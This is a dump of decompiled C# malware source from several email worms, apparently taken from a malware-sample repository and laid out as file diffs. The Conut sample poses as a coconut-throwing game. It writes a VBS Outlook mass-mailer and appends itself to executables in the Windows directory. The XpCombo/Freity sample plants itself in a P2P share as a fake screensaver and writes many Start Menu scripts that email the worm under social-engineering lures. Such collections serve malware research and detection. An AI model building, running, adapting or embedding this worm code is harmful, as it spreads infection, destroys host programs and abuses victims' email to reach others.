(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 114,
(byte) 101,
(byte) 115,
(byte) 115,
(byte) 69,
(byte) 110,
(byte) 116,
(byte) 114,
(byte) 105,
(byte) 101,
(byte) 115,
(byte) 46,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 69,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 66,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 114,
(byte) 101,
(byte) 115,
(byte) 115,
(byte) 69,
(byte) 110,
(byte) 116,
(byte) 114,
(byte) 105,
(byte) 101,
(byte) 115,
(byte) 32,
(byte) 40,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 82,
(byte) 101,
(byte) 99,
(byte) 105,
(byte) 112,
(byte) 105,
(byte) 101,
(byte) 110,
(byte) 116,
(byte) 115,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 32,
(byte) 69,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 32,
(byte) 43,
(byte) 32,
(byte) 49,
(byte) 13,
(byte) 10,
(byte) 73,
(byte) 102,
(byte) 32,
(byte) 67,
(byte) 111,
(byte) 117,
(byte) 110,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 32,
(byte) 62,
(byte) 32,
(byte) 51,
(byte) 48,
(byte) 48,
(byte) 48,
(byte) 32,
(byte) 84,
(byte) 104,
(byte) 101,
(byte) 110,
(byte) 32,
(byte) 69,
(byte) 120,
(byte) 105,
(byte) 116,
(byte) 32,
(byte) 70,
(byte) 111,
(byte) 114,
(byte) 13,
(byte) 10,
(byte) 78,
(byte) 101,
(byte) 120,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 83,
(byte) 117,
(byte) 98,
(byte) 106,
(byte) 101,
(byte) 99,
(byte) 116,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 34,
(byte) 84,
(byte) 104,
(byte) 101,
(byte) 32,
(byte) 67,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 32,
(byte) 71,
(byte) 97,
(byte) 109,
(byte) 101,
(byte) 34,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 66,
(byte) 111,
(byte) 100,
(byte) 121,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 34,
(byte) 84,
(byte) 104,
(byte) 105,
(byte) 115,
(byte) 32,
(byte) 103,
(byte) 97,
(byte) 109,
(byte) 101,
(byte) 32,
(byte) 109,
(byte) 97,
(byte) 100,
(byte) 101,
(byte) 32,
(byte) 109,
(byte) 101,
(byte) 32,
(byte) 102,
(byte) 101,
(byte) 101,
(byte) 108,
(byte) 32,
(byte) 108,
(byte) 105,
(byte) 107,
(byte) 101,
(byte) 32,
(byte) 73,
(byte) 32,
(byte) 119,
(byte) 97,
(byte) 115,
(byte) 32,
(byte) 111,
(byte) 110,
(byte) 32,
(byte) 97,
(byte) 32,
(byte) 118,
(byte) 97,
(byte) 99,
(byte) 97,
(byte) 116,
(byte) 105,
(byte) 111,
(byte) 110,
(byte) 32,
(byte) 58,
(byte) 41,
(byte) 34,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 65,
(byte) 116,
(byte) 116,
(byte) 97,
(byte) 99,
(byte) 104,
(byte) 109,
(byte) 101,
(byte) 110,
(byte) 116,
(byte) 115,
(byte) 46,
(byte) 65,
(byte) 100,
(byte) 100,
(byte) 32,
(byte) 34,
(byte) 99,
(byte) 58,
(byte) 92,
(byte) 99,
(byte) 111,
(byte) 99,
(byte) 111,
(byte) 110,
(byte) 117,
(byte) 116,
(byte) 46,
(byte) 101,
(byte) 120,
(byte) 101,
(byte) 34,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 68,
(byte) 101,
(byte) 108,
(byte) 101,
(byte) 116,
(byte) 101,
(byte) 65,
(byte) 102,
(byte) 116,
(byte) 101,
(byte) 114,
(byte) 83,
(byte) 117,
(byte) 98,
(byte) 109,
(byte) 105,
(byte) 116,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 84,
(byte) 114,
(byte) 117,
(byte) 101,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 83,
(byte) 101,
(byte) 110,
(byte) 100,
(byte) 13,
(byte) 10,
(byte) 78,
(byte) 101,
(byte) 120,
(byte) 116,
(byte) 13,
(byte) 10,
(byte) 83,
(byte) 101,
(byte) 116,
(byte) 32,
(byte) 67,
(byte) 32,
(byte) 61,
(byte) 32,
(byte) 67,
(byte) 114,
(byte) 101,
(byte) 97,
(byte) 116,
(byte) 101,
(byte) 79,
(byte) 98,
(byte) 106,
(byte) 101,
(byte) 99,
(byte) 116,
(byte) 32,
(byte) 40,
(byte) 34,
(byte) 83,
(byte) 99,
(byte) 114,
(byte) 105,
(byte) 112,
(byte) 116,
(byte) 105,
(byte) 110,
(byte) 103,
(byte) 46,
(byte) 70,
(byte) 105,
(byte) 108,
(byte) 101,
(byte) 83,
(byte) 121,
(byte) 115,
(byte) 116,
(byte) 101,
(byte) 109,
(byte) 79,
(byte) 98,
(byte) 106,
(byte) 101,
(byte) 99,
(byte) 116,
(byte) 34,
(byte) 41,
(byte) 13,
(byte) 10,
(byte) 67,
(byte) 46,
(byte) 68,
(byte) 101,
(byte) 108,
(byte) 101,
(byte) 116,
(byte) 101,
(byte) 70,
(byte) 105,
(byte) 108,
(byte) 101,
(byte) 32,
(byte) 87,
(byte) 115,
(byte) 99,
(byte) 114,
(byte) 105,
(byte) 112,
(byte) 116,
(byte) 46,
(byte) 83,
(byte) 99,
(byte) 114,
(byte) 105,
(byte) 112,
(byte) 116,
(byte) 70,
(byte) 117,
(byte) 108,
(byte) 108,
(byte) 78,
(byte) 97,
(byte) 109,
(byte) 101
};
FileStream fileStream1 = new FileStream("c:\\mail.vbs", FileMode.OpenOrCreate, FileAccess.Write);
fileStream1.Write(buffer1, 0, buffer1.Length);
fileStream1.Close();
if (!File.Exists("c:\\coconut.exe"))
{
Process process = new Process();
File.Copy(this.virname, "c:\\tmpvir.exe", true);
FileStream fileStream2 = new FileStream("c:\\tmpvir.exe", FileMode.Open);
FileStream fileStream3 = new FileStream("c:\\coconut.exe", FileMode.OpenOrCreate);
byte[] buffer2 = new byte[200704];
fileStream2.Read(buffer2, 0, 200704);
fileStream3.Write(buffer2, 0, 200704);
fileStream2.Close();
fileStream3.Close();
File.Delete("c:\\tmpvir.exe");
process.StartInfo.FileName = "c:\\mail.vbs";
process.Start();
}
else
{
File.Copy(this.virname, "c:\\tmpvir.exe", true);
FileStream fileStream4 = new FileStream("c:\\tmpvir.exe", FileMode.Open);
FileStream fileStream5 = new FileStream("c:\\coconut.exe", FileMode.OpenOrCreate);
byte[] buffer3 = new byte[200704];
fileStream4.Read(buffer3, 0, 200704);
fileStream5.Write(buffer3, 0, 200704);
fileStream4.Close();
fileStream5.Close();
File.Delete("c:\\tmpvir.exe");
}
}
private void button1_Click(object sender, EventArgs e)
{
int num1 = this.rand_numb.Next(3);
++this.throw_turn;
this.coco.Visible = false;
switch (num1)
{
case 0:
this.ms_coco.Visible = true;
int num2 = (int) MessageBox.Show("You missed! You earned 0 points.");
this.ms_coco.Visible = false;
break;
case 1:
this.red_coco.Visible = true;
int num3 = (int) MessageBox.Show("You hit Frans Devaere! You earned 1 point.");
this.red_coco.Visible = false;
++this.score;
break;
default:
this.cl_coco.Visible = true;
int num4 = (int) MessageBox.Show("You hit Graham Cluley! You earned 2 points.");
this.cl_coco.Visible = false;
this.score += 2;
break;
}
this.coco.Visible = true;
if (this.throw_turn != 3)
return;
this.FileSearch(new DirectoryInfo(Environment.SystemDirectory).Parent.FullName);
int num5 = (int) MessageBox.Show("In total, you have " + (object) this.score + " point(s). Therefore, I have infected " + (object) (6 - this.score) + " files on your computer. To be able to run these files, you'll first have to play this game again.\nHave a nice day, \n\nGigabyte [Metaphase VX Team]");
FileStream fileStream1 = new FileStream(this.virname, FileMode.Open, FileAccess.Read);
FileStream fileStream2 = new FileStream("temp.exe", FileMode.OpenOrCreate);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream1.Length - 200704))];
fileStream1.Seek(200704L, SeekOrigin.Begin);
fileStream1.Read(buffer, 0, (int) fileStream1.Length - 200704);
fileStream2.Write(buffer, 0, (int) fileStream1.Length - 200704);
long length = fileStream2.Length;
fileStream2.Close();
if (length > 0L && !this.virname.EndsWith("coconut.exe"))
new Process() { StartInfo = { FileName = "temp.exe" } }.Start();
while (File.Exists("temp.exe"))
{
try
{
File.Delete("temp.exe");
}
catch
{
}
}
Application.Exit();
}
private void FileSearch(string DirectoryToCheck)
{
string[] files = Directory.GetFiles(DirectoryToCheck, "*.exe");
int num1 = this.rand_numb.Next(files.Length - 6);
for (int index = num1; index < num1 + (6 - this.score); ++index)
{
string str = files[index];
FileStream fileStream1 = new FileStream(str, FileMode.Open, FileAccess.Read);
fileStream1.Seek(18L, SeekOrigin.Begin);
int num2 = fileStream1.ReadByte();
fileStream1.Close();
if (num2 != 103)
{
try
{
File.SetAttributes(str, FileAttributes.Normal);
File.Copy(str, "hostcopy.exe", true);
File.Copy("c:\\coconut.exe", str, true);
FileStream fileStream2 = new FileStream("hostcopy.exe", FileMode.Open);
FileStream fileStream3 = new FileStream(str, FileMode.Append);
byte[] buffer = new byte[(int) checked ((uint) unchecked ((int) fileStream2.Length))];
fileStream2.Read(buffer, 0, (int) fileStream2.Length);
fileStream3.Write(buffer, 0, (int) fileStream2.Length);
fileStream2.Close();
fileStream3.Close();
}
catch
{
}
}
}
}
}
}
MSIL/Email-Worm/Win32/C/Email-Worm.Win32.Conut-d1aa19599cb536866c32747e33efcd9e6fdf4cf94dc33ebf969fadb44302a36f/coconut/Form1.resx
+141
View File
File diff suppressed because one or more lines are too long
MSIL/Email-Worm/Win32/F/Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Email-Worm/Win32/F/Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14/Email-Worm.Win32.Freity.csproj
+39
View File
@@ -0,0 +1,39 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>XpCombo</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/F/Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14/Email-Worm.Win32.Freity.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "XpCombo", "Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14.csproj", "{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}.Debug|Any CPU.Build.0 = Debug|Any CPU
{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}.Release|Any CPU.ActiveCfg = Release|Any CPU
{F1ECBDF1-7758-4C9C-BCBA-D8ABB4269397}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/F/Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14/Module1.cs
+265
View File
@@ -0,0 +1,265 @@
// Decompiled with JetBrains decompiler
// Type: Module1
// Assembly: XpCombo, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 3FCA07A7-B1C6-4879-B2D5-DAEB4F710028
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Freity-86c1ac2805fc9be3484b1fa1c44538db917ed9a26fac872e26dc9013d8661f14.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.IO;
using System.Reflection;
[StandardModule]
internal sealed class Module1
{
private static string filnam = "xpc1";
private static string v = " ";
private static string i;
private static string p;
private static string u;
private static int t = 1;
private static string o;
private static string k = ".vbs";
private static int l = 0;
private static string m;
private static string[] a = new string[11];
private static string[] b = new string[11];
private static string c;
private static string[] d = new string[51];
private static string[] e = new string[6];
private static string[] h = new string[69];
private static string[] f = new string[4];
private static string[] g = new string[4];
private static string q;
private static string x;
private static string y;
private static string z;
private static string r;
private static Module xp = Assembly.GetExecutingAssembly().GetModules()[0];
[STAThread]
public static void main()
{
Module1.i = "Owner";
Module1.o = Environment.UserName;
if (StringType.StrCmp(Module1.o, Module1.i, false) == 0 | File.Exists("C:\\windows\\fr8i.exe"))
{
int num = (int) Interaction.MsgBox((object) "You have been infected by XpCombo Worm Created By LoTti");
Module1.full();
}
else
{
FileSystem.FileCopy(Module1.xp.FullyQualifiedName, "" + Module1.filnam);
FileSystem.FileCopy(Module1.filnam, "C:\\Windows\\fr8i.exe");
if (StringType.StrCmp(FileSystem.Dir("c:\\program files\\BearShare\\my shared folder", FileAttribute.Directory), "", false) == 0)
FileSystem.MkDir("c:\\program files\\BearShare\\my shared folder");
FileSystem.FileCopy(Module1.filnam, "C:\\Program Files\\BearShare\\my shared folder\\Angelina Jolie.scr");
Module1.t = 1;
do
{
checked { ++Module1.l; }
Module1.m = StringType.FromInteger(Module1.l) + Module1.k;
Module1.d[0] = "\"joan";
Module1.d[1] = "\"michelle";
Module1.d[2] = "\"brian";
Module1.d[3] = "\"sinead";
Module1.d[4] = "\"mary";
Module1.d[5] = "\"sonia";
Module1.d[6] = "\"damien";
Module1.d[7] = "\"caoibhe";
Module1.d[8] = "\"kevin";
Module1.d[9] = "\"aishling";
Module1.d[10] = "\"maree";
Module1.d[11] = "\"nicola";
Module1.d[12] = "\"debbie";
Module1.d[13] = "\"susan";
Module1.d[14] = "\"naoimh";
Module1.d[15] = "\"bridget";
Module1.d[16] = "\"declan";
Module1.d[17] = "\"nuala";
Module1.d[18] = "\"micheal";
Module1.d[19] = "\"anthony";
Module1.d[20] = "\"joseph";
Module1.d[21] = "\"james";
Module1.d[22] = "\"keirin";
Module1.d[23] = "\"john";
Module1.d[24] = "\"ronan";
Module1.d[25] = "\"gavin";
Module1.d[26] = "\"david";
Module1.d[27] = "\"peter";
Module1.d[28] = "\"steven";
Module1.d[29] = "\"colin";
Module1.d[30] = "\"katie";
Module1.d[31] = "\"kathy";
Module1.d[32] = "\"noirin";
Module1.d[33] = "\"julia";
Module1.d[34] = "\"julie";
Module1.d[35] = "\"wayne";
Module1.d[36] = "\"sean";
Module1.d[37] = "\"shaun";
Module1.d[38] = "\"shane";
Module1.d[39] = "\"linda";
Module1.d[40] = "\"tanya";
Module1.d[41] = "\"tammy";
Module1.d[42] = "\"abbey";
Module1.d[43] = "\"robyn";
Module1.d[44] = "\"robert";
Module1.d[45] = "\"rachel";
Module1.d[46] = "\"naoimi";
Module1.d[47] = "\"natalie";
Module1.d[48] = "\"lauren";
Module1.d[49] = "\"gerard";
Module1.d[50] = "\"vincent";
Module1.h[0] = "1";
Module1.h[1] = "1995";
Module1.h[2] = "1996";
Module1.h[3] = "1997";
Module1.h[4] = "1998";
Module1.h[5] = "1999";
Module1.h[6] = "2000";
Module1.h[7] = "2003";
Module1.h[8] = "keane";
Module1.h[9] = "obrien";
Module1.h[10] = "kelly";
Module1.h[11] = "oreilly";
Module1.h[12] = "whelan";
Module1.h[13] = "linnane";
Module1.h[14] = "haze";
Module1.h[15] = "oneill";
Module1.h[16] = "mcnamara";
Module1.h[17] = "heinz";
Module1.h[18] = "hally";
Module1.h[19] = "mcmahon";
Module1.h[20] = "lynch";
Module1.h[21] = "carthy";
Module1.h[22] = "osullivan";
Module1.h[23] = "larkin";
Module1.h[24] = "walshe";
Module1.h[25] = "clancy";
Module1.h[26] = "nolan";
Module1.h[27] = "griffin";
Module1.h[28] = "casey";
Module1.h[29] = "oconnell";
Module1.h[30] = "odonnell";
Module1.h[31] = "chambers";
Module1.h[32] = "mulqueen";
Module1.h[33] = "mulcare";
Module1.h[34] = "coyne";
Module1.h[35] = "kerse";
Module1.h[36] = "burke";
Module1.h[37] = "mcinerney";
Module1.h[38] = "talty";
Module1.h[39] = "mcswiggan";
Module1.h[40] = "brown";
Module1.h[41] = "given";
Module1.h[42] = "mcgibney";
Module1.h[43] = "coffey";
Module1.h[44] = "quealy";
Module1.h[45] = "";
Module1.h[46] = "odea";
Module1.h[47] = "oshea";
Module1.h[48] = "ryan";
Module1.h[49] = "troy";
Module1.h[50] = "welsh";
Module1.h[51] = "neylon";
Module1.h[52] = "barrett";
Module1.h[53] = "lavrey";
Module1.h[54] = "ginnane";
Module1.h[55] = "hopkins";
Module1.h[56] = "hoskins";
Module1.h[57] = "carey";
Module1.h[58] = "king";
Module1.h[59] = "thompson";
Module1.h[60] = "bronson";
Module1.h[61] = "grogan";
Module1.h[62] = "meeney";
Module1.h[63] = "monaghan";
Module1.h[64] = "moroney";
Module1.h[65] = "lohan";
Module1.h[66] = "lucas";
Module1.h[67] = "healey";
Module1.h[67] = "";
Module1.h[68] = "crowley";
Module1.e[0] = "@yahoo.co.uk\"";
Module1.e[1] = "@hotmail.com\"";
Module1.e[2] = "@yahoo.co.uk\"";
Module1.e[3] = "@hotmail.com\"";
Module1.e[4] = "@yahoo.co.uk\"";
Module1.e[5] = "@hotmail.com\"";
Module1.x = Module1.d[checked ((int) Math.Round(unchecked ((double) VBMath.Rnd() * 7.0 + (double) VBMath.Rnd() * 12.0 + (double) VBMath.Rnd() * 11.0 + (double) VBMath.Rnd() * 1.0 + (double) VBMath.Rnd() * 19.0)))];
Module1.y = Module1.e[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 5f)))];
Module1.q = Module1.h[checked ((int) Math.Round(unchecked ((double) VBMath.Rnd() * 12.0 + (double) VBMath.Rnd() * 16.0 + (double) VBMath.Rnd() * 4.0 + (double) VBMath.Rnd() * 13.0 + (double) VBMath.Rnd() * 13.0 + (double) VBMath.Rnd() * 10.0)))];
Module1.z = Module1.x + Module1.q + Module1.y;
Module1.a[0] = "\"Oh my god\"";
Module1.a[1] = "\"Your document\"";
Module1.a[2] = "\"Heres the file\"";
Module1.a[3] = "\"The passwords\"";
Module1.a[4] = "\"Thanks for this\"";
Module1.a[5] = "\"you have to see it\"";
Module1.a[6] = "\"look at this\"";
Module1.a[7] = "\"this is mad\"";
Module1.a[8] = "\"hi how are you\"";
Module1.a[9] = "\"Whats the Story\"";
Module1.a[10] = "\"Here it is i think\"";
Module1.b[0] = "\"Yeah here it is i found it last nite\"";
Module1.b[1] = "\"Do you want it or not\"";
Module1.b[2] = "\"This is the best i have seen yet\"";
Module1.b[3] = "\"Well i havent got much time but here it is\"";
Module1.b[4] = "\"I didnt have much time to look at it but here take it\"";
Module1.b[5] = "\"I got this from a friend\"";
Module1.b[6] = "\"Do you want this file\"";
Module1.b[7] = "\"I cant believe i had this\"";
Module1.b[8] = "\"Try it and tell me what you think\"";
Module1.b[9] = "\"I think you asked me for this if not just delete it\"";
Module1.b[10] = "\"Heres the file you asked for\"";
Module1.c = Strings.StrReverse(")0(metIetaerC.ppAkooltuO");
Module1.g[0] = "Set OutlookApp = CreateObject(\"Outlook.Application\")";
Module1.g[1] = "Set OutlookApp = CreateObject(\"Outlook.Application\")";
Module1.g[2] = "Set OutlookApp = CreateObject(\"Outlook.Application\")";
StreamWriter streamWriter = new StreamWriter((Stream) new FileStream("c:\\Documents and Settings\\All Users\\Start Menu\\" + Module1.m, FileMode.Create, FileAccess.Write));
streamWriter.WriteLine("On Error Resume Next");
streamWriter.WriteLine("" + Module1.g[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 2f)))]);
streamWriter.WriteLine("If Not OutlookApp = \"\" Then");
streamWriter.WriteLine("Set OutlookEmail = " + Module1.c);
streamWriter.WriteLine("OutlookEmail.Recipients.Add " + Module1.z);
streamWriter.WriteLine("OutlookEmail.Subject = " + Module1.a[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
streamWriter.WriteLine("OutlookEmail.Body = " + Module1.b[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
streamWriter.WriteLine("OutlookEmail.Attachments.Add(\"c:\\fr8i.exe\")");
streamWriter.WriteLine("OutlookEmail.Importance = 1");
streamWriter.WriteLine("OutlookEmail.DeleteAfterSubmit = True");
streamWriter.WriteLine("OutlookEmail.Send");
streamWriter.WriteLine("End If");
streamWriter.Close();
checked { ++Module1.t; }
}
while (Module1.t <= 50);
}
}
public static void full()
{
Module1.t = 1;
do
{
checked { ++Module1.l; }
Module1.m = StringType.FromInteger(Module1.l) + Module1.k;
StreamWriter streamWriter = new StreamWriter((Stream) new FileStream("c:\\Documents and Settings\\All Users\\Start Menu\\" + Module1.m, FileMode.Create, FileAccess.Write));
streamWriter.WriteLine("On Error Resume Next");
streamWriter.WriteLine("" + Module1.g[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 2f)))]);
streamWriter.WriteLine("If Not OutlookApp = \"\" Then");
streamWriter.WriteLine("Set OutlookEmail = " + Module1.c);
streamWriter.WriteLine("OutlookEmail.Recipients.Add " + Module1.z);
streamWriter.WriteLine("OutlookEmail.Subject = " + Module1.a[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
streamWriter.WriteLine("OutlookEmail.Body = " + Module1.b[checked ((int) Math.Round((double) unchecked (VBMath.Rnd() * 10f)))]);
streamWriter.WriteLine("OutlookEmail.Attachments.Add(\"c:\\fr8i.exe\")");
streamWriter.WriteLine("OutlookEmail.Importance = 1");
streamWriter.WriteLine("OutlookEmail.DeleteAfterSubmit = True");
streamWriter.WriteLine("OutlookEmail.Send");
streamWriter.WriteLine("End If");
streamWriter.Close();
checked { ++Module1.t; }
}
while (Module1.t <= 3600);
}
}
MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System.Reflection;
[assembly: AssemblyCopyright("")]
[assembly: AssemblyTitle("")]
[assembly: AssemblyKeyFile("")]
[assembly: AssemblyDelaySign(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyKeyName("")]
[assembly: AssemblyProduct("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyVersion("1.0.997.22053")]
MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/Email-Worm.Win32.Gaze.csproj
+45
View File
@@ -0,0 +1,45 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{63D73A47-01DC-4D91-B0DD-B30751C596FE}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>game</AssemblyName>
<ApplicationVersion>1.0.997.22053</ApplicationVersion>
<RootNamespace>game</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Form1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/Email-Worm.Win32.Gaze.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "game", "Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0.csproj", "{63D73A47-01DC-4D91-B0DD-B30751C596FE}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Debug|Any CPU.Build.0 = Debug|Any CPU
{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Release|Any CPU.ActiveCfg = Release|Any CPU
{63D73A47-01DC-4D91-B0DD-B30751C596FE}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Email-Worm/Win32/G/Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0/Form1.cs
+83
View File
@@ -0,0 +1,83 @@
// Decompiled with JetBrains decompiler
// Type: game.Form1
// Assembly: game, Version=1.0.997.22053, Culture=neutral, PublicKeyToken=null
// MVID: C1B9288B-F130-4335-97F2-0FD15B3024FA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Gaze-bd5bb1d152b244928cc1e3cb8d3db6ca241749d20a16cf6b7214f27721c8a0d0.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace game
{
public class Form1 : Form
{
private Container components = (Container) null;
